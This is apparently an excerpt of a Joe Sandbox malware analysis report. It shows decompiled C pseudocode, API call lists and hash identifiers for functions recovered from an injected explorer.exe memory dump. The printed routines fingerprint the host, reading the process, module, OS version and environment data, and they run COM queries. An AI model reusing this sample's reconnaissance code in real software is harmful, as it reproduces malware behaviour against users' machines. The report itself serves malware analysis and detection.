                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                            • Instruction ID: b32fbe6ba74ab13a60de709608ce14b267378680ed387debe1417f5410f660e5
                            • Opcode Fuzzy Hash: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                            • Instruction Fuzzy Hash: C0F0A031300702DBC720BF62E80496BBBE9FF563507048829E5C687962DB71F8019790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008B337, Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E0008B337(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0x9e684; // 0xc2f8f0
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0x9e684; // 0xc2f8f0
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					CloseHandle(_t12);
					return _t13;
				}
				return _t5;
			}








                            0x0008b337
                            0x0008b33f
                            0x0008b344
                            0x0008b34a
                            0x0008b34e
                            0x0008b350
                            0x0008b355
                            0x0008b35e
                            0x0008b362
                            0x0008b362
                            0x0008b36a
                            0x00000000
                            0x0008b36d
                            0x0008b371

                            APIs
                            • CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                            • Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
                            • Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                            • Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 0008D01F, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282COMMON
                            Download Yara Rule
                            C-Code - Quality: 86%
                            			E0008D01F(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x9e69c; // 0x10000000
				_t81 = E00088604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x9e684; // 0xc2f8f0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E0008BA05();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E0008BB8D( *_t88) == 0) {
					_t90 = E0008BA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0x9e68c; // 0xc2fab8
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0x9e694; // 0xc2fa48
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E0008B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E0008B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E00088FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E0008B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x9e684; // 0xc2f8f0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E000895E1(_t199, 0x10c);
				_t200 =  *0x9e684; // 0xc2f8f0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x9e684; // 0xc2f8f0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E000885D5( &_v8);
				_t124 =  *0x9e684; // 0xc2f8f0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E00089640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x9e684; // 0xc2f8f0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x9e684; // 0xc2f8f0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x9e684; // 0xc2f8f0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x9e684; // 0xc2f8f0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x9e684; // 0xc2f8f0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x9e684; // 0xc2f8f0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E000922D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
				return _t222;
			}



















































                            0x0008d01f
                            0x0008d029
                            0x0008d035
                            0x0008d03a
                            0x0008d03f
                            0x0008d3ff
                            0x0008d3ff
                            0x0008d04c
                            0x0008d052
                            0x0008d057
                            0x0008d05d
                            0x0008d06d
                            0x0008d079
                            0x0008d079
                            0x0008d082
                            0x0008d088
                            0x0008d08a
                            0x0008d093
                            0x0008d093
                            0x0008d09f
                            0x0008d0a3
                            0x0008d0a8
                            0x0008d0ae
                            0x0008d0b7
                            0x0008d0c5
                            0x0008d0cc
                            0x0008d0d1
                            0x0008d0d1
                            0x0008d0d2
                            0x0008d0b9
                            0x0008d0b9
                            0x0008d0b9
                            0x0008d0d8
                            0x0008d0e3
                            0x0008d0f1
                            0x0008d0f7
                            0x0008d0fb
                            0x0008d101
                            0x0008d108
                            0x0008d10f
                            0x0008d113
                            0x0008d11a
                            0x0008d11b
                            0x0008d128
                            0x0008d12a
                            0x0008d12f
                            0x0008d13c
                            0x0008d13e
                            0x0008d13e
                            0x0008d140
                            0x0008d14a
                            0x0008d156
                            0x0008d166
                            0x0008d16c
                            0x0008d172
                            0x0008d174
                            0x0008d185
                            0x0008d18b
                            0x0008d191
                            0x0008d196
                            0x0008d19c
                            0x0008d1a2
                            0x0008d1a7
                            0x0008d1ac
                            0x0008d1ac
                            0x0008d1b2
                            0x0008d1b2
                            0x0008d1bb
                            0x0008d1c7
                            0x0008d1cf
                            0x0008d1d3
                            0x0008d1d3
                            0x0008d1cf
                            0x0008d1d7
                            0x0008d1dd
                            0x0008d1e3
                            0x0008d1ea
                            0x0008d1fb
                            0x0008d201
                            0x0008d209
                            0x0008d210
                            0x0008d223
                            0x0008d229
                            0x0008d22e
                            0x0008d231
                            0x0008d234
                            0x0008d23a
                            0x0008d240
                            0x0008d242
                            0x0008d248
                            0x0008d251
                            0x0008d254
                            0x0008d254
                            0x0008d257
                            0x0008d25f
                            0x0008d26a
                            0x0008d270
                            0x0008d261
                            0x0008d263
                            0x0008d263
                            0x0008d279
                            0x0008d279
                            0x0008d27f
                            0x0008d287
                            0x0008d292
                            0x0008d297
                            0x0008d29d
                            0x0008d29f
                            0x0008d2ac
                            0x0008d2ad
                            0x0008d2ae
                            0x0008d2b9
                            0x0008d2bb
                            0x0008d2c2
                            0x0008d2c2
                            0x0008d2cc
                            0x0008d2d1
                            0x0008d2d6
                            0x0008d2d6
                            0x0008d2dc
                            0x0008d2e3
                            0x0008d2e4
                            0x0008d2f1
                            0x0008d304
                            0x0008d309
                            0x0008d30e
                            0x0008d317
                            0x0008d317
                            0x0008d31d
                            0x0008d322
                            0x0008d328
                            0x0008d32e
                            0x0008d333
                            0x0008d33c
                            0x0008d33e
                            0x0008d345
                            0x0008d345
                            0x0008d34b
                            0x0008d353
                            0x0008d358
                            0x0008d359
                            0x0008d35e
                            0x0008d367
                            0x0008d369
                            0x0008d374
                            0x0008d374
                            0x0008d37d
                            0x0008d385
                            0x0008d38c
                            0x0008d391
                            0x0008d3a0
                            0x0008d3b8
                            0x0008d3bf
                            0x0008d3cd
                            0x0008d3df
                            0x0008d3e6
                            0x0008d3f3
                            0x00000000

                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • GetCurrentProcessId.KERNEL32 ref: 0008D046
                            • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
                            • GetCurrentProcess.KERNEL32 ref: 0008D09F
                            • GetLastError.KERNEL32 ref: 0008D13E
                            • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
                            • GetLastError.KERNEL32 ref: 0008D172
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
                            • GetCurrentProcess.KERNEL32 ref: 0008D20E
                            • memset.MSVCRT ref: 0008D229
                            • GetVersionExA.KERNEL32(00000000), ref: 0008D234
                            • GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
                            • GetSystemInfo.KERNEL32(?), ref: 0008D26A
                            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
                            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                            • API String ID: 3876402152-2706916422
                            • Opcode ID: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
                            • Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
                            • Opcode Fuzzy Hash: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
                            • Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 50%
                            			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0008D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E00088604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E0008861A( &_v60, 0xfffffffe);
					E0008D5D7( &_v104);
					return _t320;
				}
				_t165 = E000895E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E000895E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E000892E5(_t165);
				_v60 = _t322;
				E000885D5( &_v52);
				E000885D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E000895E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E000885D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E0008861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E000891E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E00088698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E0008861A(_t136, 0);
								E0008861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E000891E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E000895E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E000895E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E000885D5( &_v92);
											E000885D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E00089640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E000895E1(_t283, 0x219);
										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E000885D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E000891E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0008DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E0008861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                            0x0008db45
                            0x0008db4b
                            0x0008db52
                            0x0008db55
                            0x0008db58
                            0x0008db5d
                            0x0008db5f
                            0x0008db64
                            0x0008dfac
                            0x0008dfac
                            0x0008db71
                            0x0008db73
                            0x0008db76
                            0x0008db79
                            0x0008df91
                            0x0008df97
                            0x0008dfa1
                            0x00000000
                            0x0008dfa6
                            0x0008db84
                            0x0008db8b
                            0x0008db92
                            0x0008db95
                            0x0008db9a
                            0x0008db9c
                            0x0008db9f
                            0x0008dba2
                            0x0008dba3
                            0x0008dbac
                            0x0008dbb2
                            0x0008dbb5
                            0x0008dbbe
                            0x0008dbc3
                            0x0008dbc8
                            0x0008dbdf
                            0x0008dbec
                            0x0008dbef
                            0x0008dbf6
                            0x0008dbfb
                            0x0008dc02
                            0x0008dc07
                            0x0008dc0e
                            0x0008dc10
                            0x0008dc1c
                            0x0008dc1f
                            0x0008dc21
                            0x0008df81
                            0x0008df82
                            0x0008df8b
                            0x00000000
                            0x0008df8b
                            0x0008dc27
                            0x0008dc2a
                            0x0008dc2d
                            0x0008dc30
                            0x0008dc32
                            0x0008df4d
                            0x0008df50
                            0x0008df53
                            0x0008df55
                            0x0008df77
                            0x0008df7c
                            0x0008df57
                            0x0008df5a
                            0x0008df65
                            0x0008df6c
                            0x0008df6c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008dc38
                            0x0008dc38
                            0x0008dc4a
                            0x0008dc4d
                            0x0008dc4f
                            0x00000000
                            0x00000000
                            0x0008dc57
                            0x0008dc5a
                            0x0008dc5d
                            0x0008dc60
                            0x0008dc63
                            0x0008dc66
                            0x00000000
                            0x00000000
                            0x0008dc6c
                            0x0008dc7a
                            0x0008dc7d
                            0x0008dc7f
                            0x0008dc98
                            0x0008dca7
                            0x0008dcaf
                            0x0008dcaf
                            0x0008dcb2
                            0x0008dcb9
                            0x0008dcbd
                            0x0008dcc3
                            0x0008dcc5
                            0x0008df35
                            0x0008df3b
                            0x0008df41
                            0x0008df44
                            0x0008df44
                            0x00000000
                            0x0008df44
                            0x0008dcd4
                            0x0008dce8
                            0x0008dcec
                            0x0008dcee
                            0x0008dcf3
                            0x0008df02
                            0x0008df08
                            0x0008df13
                            0x0008df1e
                            0x0008df24
                            0x0008df2a
                            0x0008df2d
                            0x00000000
                            0x0008df2d
                            0x0008dcf9
                            0x0008ded0
                            0x0008ded0
                            0x0008ded3
                            0x0008ded6
                            0x00000000
                            0x00000000
                            0x0008dd01
                            0x0008dd09
                            0x0008dd10
                            0x0008dd16
                            0x0008dd18
                            0x00000000
                            0x00000000
                            0x0008dd21
                            0x0008dd36
                            0x0008dd3c
                            0x0008dd45
                            0x0008dd48
                            0x0008dd4b
                            0x0008dd4d
                            0x0008dec3
                            0x0008dec6
                            0x0008decf
                            0x0008decf
                            0x00000000
                            0x0008decf
                            0x0008dd5d
                            0x0008dd60
                            0x0008dd67
                            0x0008dd6d
                            0x0008dd70
                            0x0008dd73
                            0x0008dd76
                            0x0008dd79
                            0x0008ddb5
                            0x0008ddb5
                            0x0008ddb8
                            0x0008de64
                            0x0008de78
                            0x0008de88
                            0x0008de8c
                            0x0008de8e
                            0x0008dea5
                            0x0008dea9
                            0x0008deb2
                            0x0008debd
                            0x00000000
                            0x0008debd
                            0x0008de94
                            0x0008de95
                            0x0008de9a
                            0x0008de9a
                            0x0008de9c
                            0x0008de9d
                            0x0008dea2
                            0x00000000
                            0x0008dea2
                            0x0008ddbe
                            0x0008ddbe
                            0x0008ddc1
                            0x0008de2c
                            0x0008de40
                            0x0008de50
                            0x0008de54
                            0x0008de56
                            0x00000000
                            0x00000000
                            0x0008de5c
                            0x0008de5d
                            0x00000000
                            0x0008de5d
                            0x0008ddc3
                            0x0008ddc3
                            0x0008ddc6
                            0x00000000
                            0x00000000
                            0x0008ddc8
                            0x0008ddcb
                            0x00000000
                            0x00000000
                            0x0008ddcd
                            0x0008ddcd
                            0x0008ddd3
                            0x0008ddef
                            0x0008ddfe
                            0x0008de07
                            0x0008de0c
                            0x0008de0f
                            0x0008de15
                            0x0008de15
                            0x0008de1a
                            0x0008de26
                            0x00000000
                            0x0008de26
                            0x0008ddd8
                            0x00000000
                            0x0008ddd8
                            0x0008dd7b
                            0x0008dda2
                            0x0008dda7
                            0x0008ddac
                            0x0008ddae
                            0x0008ddae
                            0x00000000
                            0x0008ddac
                            0x0008dd7d
                            0x0008dd7d
                            0x0008dd80
                            0x00000000
                            0x00000000
                            0x0008dd86
                            0x0008dd86
                            0x0008dd89
                            0x00000000
                            0x00000000
                            0x0008dd8f
                            0x0008dd8f
                            0x0008dd92
                            0x00000000
                            0x00000000
                            0x0008dd98
                            0x0008dd9b
                            0x00000000
                            0x00000000
                            0x0008dd9d
                            0x00000000
                            0x0008dd9d
                            0x0008dedf
                            0x0008dee5
                            0x0008deeb
                            0x0008deee
                            0x0008def1
                            0x0008def1
                            0x0008def4
                            0x0008def5
                            0x0008def8
                            0x0008defa
                            0x00000000
                            0x00000000
                            0x0008df4a
                            0x0008df4a
                            0x00000000
                            0x0008df4a
                            0x0008dc81
                            0x0008dc87
                            0x00000000
                            0x0008dc87
                            0x0008df47
                            0x00000000
                            0x0008dbca
                            0x0008dbcf
                            0x0008dbd4
                            0x00000000
                            0x0008dbd8

                            APIs
                              • Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                              • Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                              • Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
